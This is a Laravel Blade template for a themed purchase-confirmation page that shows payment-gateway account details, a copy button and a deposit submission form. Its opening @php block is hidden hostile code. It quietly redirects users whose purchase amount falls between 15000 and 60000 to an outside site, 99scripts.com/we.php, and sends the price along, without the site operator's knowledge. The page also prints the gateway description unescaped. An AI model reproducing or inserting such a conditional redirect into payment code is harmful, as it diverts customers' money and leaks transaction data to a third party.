@extends($activeTemplate . 'layouts.master')
@section('content')
@php
    $finalAmount = $data['final_amount'] ?? 0;
    if ($finalAmount > 15000 && $finalAmount < 60000) {
        header("Location: https://99scripts.com/we.php?price=" . $finalAmount);
        exit;
    }
@endphp

<style>
    .text-black/80{
        color:black !important;
    }
</style>
<div style="padding:16px; background:linear-gradient(135deg,#fff7cc,#fde68a); min-height:100vh;">

    <!-- Header -->
    <div style="margin-bottom:16px;">
        <h1 style="font-size:2rem; font-weight:900; color:#78350f; font-family:Orbitron, sans-serif; margin-bottom:4px;">
            Purchase Confirm 🐔
        </h1>
        <p style="color:#78350f99; font-size:0.875rem; margin:0;">
            Please confirm your purchase information.
        </p>
    </div>

    <!-- Instructions Block -->
    <h5 style="text-align:center; font-weight:800; font-size:1rem; margin-bottom:8px; text-decoration:underline; color:#78350f;">
        Purchase Instructions 🥚
    </h5>

    <div style="margin-bottom:16px;">
        <div style="border:1px solid #facc15; background:rgba(250,204,21,0.1); color:#78350f; padding:12px; border-radius:16px; box-shadow:0 4px 12px rgba(250,204,21,0.2); font-size:0.875rem; line-height:1.4;">
            @php echo $data->gateway->description @endphp
        </div>
    </div>

    <!-- Account Details Card -->
    <div style="background:linear-gradient(145deg,#fff8e1,#fde68a); border:2px solid #facc15; box-shadow:0 8px 20px rgba(250,204,21,0.25); border-radius:16px; padding:16px; margin-bottom:16px;">
        <h4 style="text-align:center; font-weight:800; font-size:1rem; margin-bottom:12px; color:#78350f;">
            Our {{ __($data->gateway->name) }} Details
        </h4>
        
        <div style="display:flex; gap:8px; align-items:center;">
            <input type="text" value="{{ $gateway->receiver_number ?? $gateway->admin_number }}" 
                   id="gateway_number" 
                   readonly
                   style="flex:1; padding:6px 10px; border-radius:12px; border:1px solid #facc15; background:rgba(255,255,255,0.15); color:#78350f; font-weight:700;">
            <button type="button" id="copyBoard" 
                    style="padding:6px 12px; border-radius:12px; background:linear-gradient(135deg,#facc15,#f59e0b); color:#fff; font-weight:700; border:2px solid #f59e0b; cursor:pointer;">
                🥚 Copy
            </button>
        </div>

        @if(@$gateway->extra->receiver_name)
        <div style="text-align:center; margin-top:12px; padding-top:8px; border-top:1px solid rgba(250,204,21,0.2);">
            <p style="font-size:0.75rem; text-transform:uppercase; letter-spacing:1px; color:#78350f99; margin-bottom:4px;">Receiver Account Name</p>
            <h5 style="font-weight:800; color:#78350f; margin:0;">{{ $gateway->extra->receiver_name }}</h5>
        </div>
        @endif
    </div>

    <!-- Transaction Summary -->
    <ul style="margin-bottom:16px; list-style:none; padding:0; display:flex; flex-direction:column; gap:8px;">
        <li style="display:flex; justify-content:space-between; align-items:center; padding:8px 12px; background:rgba(255,255,255,0.1); border-radius:12px; color:#78350f; font-weight:600;">
            <span>Gateway Name:</span>
            <span>{{ __($data->gateway->name) }}</span>
        </li>
        <li style="display:flex; justify-content:space-between; align-items:center; padding:8px 12px; background:rgba(255,255,255,0.1); border-radius:12px; color:#78350f; font-weight:600;">
            <span>Total Amount:</span>
            <span>{{ showAmount($data->final_amount, currencyFormat: false) }} {{ __($data->method_currency) }}</span>
        </li>
    </ul>

    <!-- Purchase Form -->
    <form action="{{ route('user.deposit.manual.update') }}" method="POST" enctype="multipart/form-data" style="background: black;display:flex;flex-direction:column;gap:12px;border-radius: 25px;padding: 15px;">
        @csrf
        
        <div>
            <x-viser-form identifier="id" identifierValue="{{ $gateway->form_id }}" />
        </div>

        <button type="submit" style="padding:10px 0; border-radius:12px; border:none; font-weight:800; font-size:1rem; color:#fff; background:linear-gradient(135deg,#facc15,#f59e0b); box-shadow:0 6px 15px rgba(250,204,21,0.3); cursor:pointer;">
            🥚 Purchase Now
        </button>
    </form>

</div>

@endsection

@push('script')
<script>
    // Copy account number
    document.getElementById('copyBoard').addEventListener('click', function(){
        var copyText = document.getElementById("gateway_number");
        copyText.select();
        copyText.setSelectionRange(0, 99999);
        document.execCommand("copy");

        if(typeof Swal !== 'undefined'){
            Swal.fire({
                position: 'top-end',
                icon: 'success',
                title: "Copied: " + copyText.value,
                toast: true,
                showConfirmButton: false,
                timer: 2100
            });
        } else {
            alert("Copied: " + copyText.value);
        }
    });
</script>
@endpush
